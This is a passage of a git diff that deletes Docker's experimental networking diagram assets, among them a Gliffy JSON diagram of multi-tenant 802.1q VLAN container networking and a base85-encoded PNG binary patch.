#2(Host)eth0172.16.1.253/24(IPOptional)(Host)eth0172.16.1.254/24(IPOptional)NetworkGateway172.16.1.1/24ContainersAttachedDirectlytoParentInterface.NoBridgeUsed (Docker0)MacvlanBridgeMode &IpvlanL2Mode \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy deleted file mode 100644 index 40eed17270..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#ffffff","width":389,"height":213,"nodeIndex":276,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":null,"viewportType":"default","fitBB":{"min":{"x":5,"y":6.6999969482421875},"max":{"x":389,"y":212.14285409109937}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":64.0,"y":36.0,"rotation":0.0,"id":216,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-12.0,33.0],[84.0,33.0],[84.0,86.0],[120.0,86.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":190.0,"y":32.0,"rotation":0.0,"id":254,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#f1c232","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-142.0,16.0],[54.0,16.0],[54.0,115.0],[87.0,115.0]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":133.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":226,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":15.147567221510933,"y":139.96785409109907,"rotation":0.0,"id":115,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":29,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":116,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":17,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":117,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":26,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":120,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":120,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887324033,-1.055138662316466],[1.3318647887324033,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":118,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":119,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":120,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":121,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container1 - vlan10

192.168.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.0,"y":82.69999694824219,"rotation":0.0,"id":140,"width":150.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"


","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":71.0,"y":4.1999969482421875,"rotation":0.0,"id":187,"width":108.99999999999999,"height":19.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0 - 802.1q trunk

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":282.0,"y":8.0,"rotation":0.0,"id":199,"width":73.00000000000003,"height":40.150000000000006,"uid":"com.gliffy.shape.network.network_v4.business.router","order":32,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.network.network_v4.business.router","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#3966A0","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":55.0,"rotation":0.0,"id":210,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":5.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-8.0,11.0],[-8.0,34.0],[26.0,34.0],[26.0,57.0]],"lockSegments":{},"ortho":true}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":12.805718530101615,"y":11.940280333547719,"rotation":0.0,"id":134,"width":59.31028146989837,"height":83.0,"uid":"com.gliffy.shape.cisco.cisco_v1.servers.standard_host","order":35,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.servers.standard_host","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#3d85c6","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":64.0,"y":73.19999694824219,"rotation":0.0,"id":211,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":36,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.10

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":52.19999694824219,"rotation":0.0,"id":212,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.20

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.386363636363733,"y":108.14285409109937,"rotation":0.0,"id":219,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":139.1475672215109,"y":139.96785409109907,"rotation":0.0,"id":227,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":55,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":228,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":43,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":229,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":52,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":232,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":232,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":230,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":231,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":46,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":232,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":41,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":233,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":54,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container2 - vlan20

172.16.1.2/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":259.38636363636374,"y":108.14285409109937,"rotation":0.0,"id":248,"width":123.00000000000001,"height":104.0,"uid":"com.gliffy.shape.iphone.iphone_ios7.icons_glyphs.glyph_cloud","order":56,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.iphone.iphone_ios7.icons_glyphs.glyph_cloud","strokeWidth":1.0,"strokeColor":"#000000","fillColor":"#999999","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":265.14756722151094,"y":139.96785409109907,"rotation":0.0,"id":241,"width":107.40845070422536,"height":49.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":73,"lockAspectRatio":false,"lockShape":false,"children":[{"x":31.506478873239438,"y":2.4460032626429853,"rotation":0.0,"id":242,"width":44.395492957746484,"height":29.54388254486117,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":61,"lockAspectRatio":false,"lockShape":false,"children":[{"x":20.86588169014084,"y":2.637846655791175,"rotation":0.0,"id":243,"width":2.663729577464789,"height":24.268189233278818,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":70,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":246,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":1.0,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.3318647887323891,-1.055138662316466],[1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":244,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":67,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":245,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":246,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":59,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":247,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":72,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container3 - vlan30

10.1.1.2/16

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":31.199996948242188,"rotation":0.0,"id":253,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":74,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.30

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.49612211422149,"y":17.874999999999943,"rotation":0.0,"id":266,"width":275.00609168449375,"height":15.70000000000006,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":75,"lockAspectRatio":false,"lockShape":false,"children":[{"x":68.50387788577851,"y":43.12500000000006,"rotation":0.0,"id":258,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-31.924999999999997],[197.00221379871527,-31.925000000000153]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.50387788577851,"y":38.55333333333314,"rotation":0.0,"id":262,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":40.7533333333331,"rotation":0.0,"id":261,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":5,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":42.88666666666643,"rotation":0.0,"id":260,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":73.50387788577851,"y":43.95333333333309,"rotation":0.0,"id":259,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#ffe599","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":248.0,"y":51.19999694824219,"rotation":0.0,"id":207,"width":143.0,"height":70.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Router (gateway)

vlan10 - 192.168.1.1/24

vlan20 - 172.16.1.1/24

vlan30 - 10.1.1.1/16

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":88.19999694824219,"rotation":0.0,"id":272,"width":77.99999999999999,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":76,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":80}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#e06666","strokeWidth":2,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457586821719,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png deleted file mode 100644 index a38633cdbc23014364bfc611d650b2a17dc72ae0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 17879 zcmYhg1yEbx7cE?9f#O>wA2N=k^5TU; zo{GGTp7-KW?!7UgA^9LY@*H}Cd+%K1(B{(ASh93{t=X3Dy466wQ~@&Pj=v%}BW_Tv zbkUAB&>_O7chr-9U4T!T_5s~WI_wo`Hxeo-?Y#yLmK@UoPhtsg``T`mL=N9B!-bsW zgx|Q&gpY0y13~m9EY?WzZE_R{@hs0lpRCMaMHVgp79Xn2Ku{Ma|No98>dQ?kYv>Nv zsWm8Z-;KC6HhR6Lr!VeNd|tr%VOY^m zkwVRr&<8Req~^;ok(4~qc8%?}ztG$_^;BLz`tzB2Oc({;nbWga)0iI=_!KOa4M-C_ ztTazF`Hr*|1=0#(;FjKu?@{<00=iad-;Dj0b?Kb28_=j{!D5U#_8Zd^0xL57Wr;kV zW7Yogi>A0O_xXi?B{b%JsyPNb<9T4@0^Ua9m{`f@Ovrp&86MOYtf-^It+zxU^_2T1@9mNroUAc=~sP<&MwscFUeQ~U<|7u8-^w-37_ z?-JEMYVoHK&{lO$cTS!yzsMU2rqz<^>|956zA~~i8KsrX0scsyr~V=kQBHaJzO|cU zTzmPi`1-h;toXlFvEO)Dhttdt&?@q>Kd)2Vquk7t1{Yd_oSwgUmj1whTCDfD33ck9 z8RJU_(H9rX_0l_CkUw=EALt!#nWmXQAB_t;pO30$=Q^sZZaP`|Lj;nj;8ja2!7oV8 z60r=%w|IV$d3b~n<=QD^cSzQ7Vpm-Q+IaizNe1w?1stu&`ijkMd>wcd20ZSXmE!1I zI8Z;Z4{&eE;orfX6?=uD-Zc^jXFe|_NhE{gSt~z1m@cv{#2Ot7Dt%%N{W=MM*IAB6 zO*h~mm)cFI9OyBP>x`Y6Vxo^NBYlu5a$oT%!`QXsCSLEni?ZE5>9IAgThC|y@b=K) zup@H_BIEF_%5Ob&C2gXbHMgR~wd38|>Y>X)pg^&S(#@Qp{`5}_L)TAjPNKc3{R_Im zSTx*!+wnGYZWnBY3_>`pJ=Dj!#FUC~K^{-G#oe3eQeR|JSmIRTf|KTmOp)u~kKwNy ztr$AvQVd!r-YN-dJzN1!UqQ7M4I_mGlQj}eH&TSJxxDcg!oN~+fq?KYq*czb)8De< z@bw6WQp{wZ*NveGzgX|D9yD6qy=^=-BQVoy8O4?}f=3qpAOvaoMw*+Mnf-ufYlTmy zHG6OWpo!J2Z1iIa~O*@BFdJ2=tR+=&$w0&?W~!n&Tou+fz?XbS5x 